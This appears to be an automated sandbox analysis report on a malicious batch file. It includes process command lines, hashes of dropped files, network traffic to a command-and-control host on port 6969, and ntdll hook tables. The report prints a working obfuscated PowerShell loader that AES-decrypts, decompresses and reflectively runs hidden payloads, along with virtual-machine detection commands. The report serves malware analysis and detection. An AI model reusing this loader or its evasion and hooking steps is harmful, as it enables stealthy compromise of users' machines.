Preview:	ElfChnk.............................................x.>.....................................................................M..............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**..@............6.............B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\__PSScriptPolicyTest_oflpv5ld.lzp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_qh5es4es.ivl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466477386756994
Encrypted:	false
SSDEEP:	6144:IIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:dXD94zWlLZMM6YFH6++
MD5:	7F6446FC1C006A982E9A08317B0577A1
SHA1:	D30A6BEF2C7A2ED4E857A924CFF10090A1FB5CB0
SHA-256:	E950D3F4C172F7A3D856F585A55B6A57E8F60F343198C8A9024A09BE60AFE419
SHA-512:	084F7E579E3ACD20004A773A9C7061D33F91D1E59A30A70214E15FFA58FA75583F6A833B80F7AFA7D856DA596846AAB8EAEEE319924000DE863C30741BD9DEA6
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.6J.................................................................................................................................................................................................................................................................................................................................................(.].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.84935141926561
Encrypted:	false
SSDEEP:	3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
MD5:	D8C4F9FD5B972AE487170EA993933179
SHA1:	32E61F1DD8A462CEDC6B7A636275363B011ABDA9
SHA-256:	728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
SHA-512:	1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
Malicious:	false
Preview:	Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2692), with CRLF line terminators
Category:	dropped
Size (bytes):	2839
Entropy (8bit):	5.269550461652421
Encrypted:	false
SSDEEP:	48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
MD5:	39401ABDD4A08EE5458DF7CB80F69CED
SHA1:	A4F498F6E926AC3A23F561C1C582C51217FA9093
SHA-256:	06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1
SHA-512:	7BC97E8DF1C92730F6462151B688F1A5952F220199BD52F963A6CEA4DC04EEF6C842D776D26DF845688C369935DD71FFFE269AA75DC10B017F5926D21448C9BD
Malicious:	false
Preview:	Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblc

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
Entropy (8bit):	6.008710946572079
TrID:	BibTeX references (5501/1) 100.00%
File name:	1.cmd
File size:	5'214'429 bytes
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
SHA512:	94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
SSDEEP:	49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
TLSH:	8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
File Content Preview:	@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq

File Icon


Icon Hash:	9686878b929a9886

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 05:24:35.080461025 CEST	49861	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:35.085378885 CEST	6969	49861	192.64.119.55	192.168.2.4
Oct 4, 2024 05:24:35.085578918 CEST	49861	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:35.092184067 CEST	49861	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:35.097181082 CEST	6969	49861	192.64.119.55	192.168.2.4
Oct 4, 2024 05:24:56.445588112 CEST	6969	49861	192.64.119.55	192.168.2.4
Oct 4, 2024 05:24:56.445694923 CEST	49861	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:56.452303886 CEST	49861	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:56.457267046 CEST	6969	49861	192.64.119.55	192.168.2.4
Oct 4, 2024 05:24:59.785219908 CEST	50013	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:59.790450096 CEST	6969	50013	192.64.119.55	192.168.2.4
Oct 4, 2024 05:24:59.792226076 CEST	50013	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:59.795909882 CEST	50013	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:24:59.800807953 CEST	6969	50013	192.64.119.55	192.168.2.4
Oct 4, 2024 05:25:21.166666985 CEST	6969	50013	192.64.119.55	192.168.2.4
Oct 4, 2024 05:25:21.166768074 CEST	50013	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:21.167145967 CEST	50013	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:21.171947956 CEST	6969	50013	192.64.119.55	192.168.2.4
Oct 4, 2024 05:25:24.470298052 CEST	50014	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:24.475476027 CEST	6969	50014	192.64.119.55	192.168.2.4
Oct 4, 2024 05:25:24.475557089 CEST	50014	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:24.476286888 CEST	50014	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:24.481204987 CEST	6969	50014	192.64.119.55	192.168.2.4
Oct 4, 2024 05:25:45.838589907 CEST	6969	50014	192.64.119.55	192.168.2.4
Oct 4, 2024 05:25:45.838661909 CEST	50014	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:53.649879932 CEST	50014	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 05:25:53.655035973 CEST	6969	50014	192.64.119.55	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 05:24:35.063831091 CEST	52710	53	192.168.2.4	1.1.1.1
Oct 4, 2024 05:24:35.075117111 CEST	53	52710	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 05:24:35.063831091 CEST	192.168.2.4	1.1.1.1	0x9d3d	Standard query (0)	azure-winsecure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 05:24:35.075117111 CEST	1.1.1.1	192.168.2.4	0x9d3d	No error (0)	azure-winsecure.com		192.64.119.55	A (IP address)	IN (0x0001)	false

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	23:23:21
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Imagebase:	0x7ff626e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:23:21
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:23:22
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff6a0790000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:23:22
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff68e530000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:23:22
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff7699e0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:23:22
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff68e530000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:23:24
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase:	0x7ff626e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:23:24
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	23:23:30
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
Imagebase:	0x7ff7758e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	23:24:01
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff626e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	23:24:01
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	23:24:01
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Imagebase:	0x7ff626e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	23:24:01
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7904, Parent PID: 7804

General

Target ID:	18
Start time:	23:24:02
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:	0x7ff626e00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	23:24:02
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	23:24:02
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff6a0790000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	23:24:02
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff68e530000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	23:24:04
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff6a0790000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	23:24:04
Start date:	03/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff68e530000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	23:24:22
Start date:	03/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
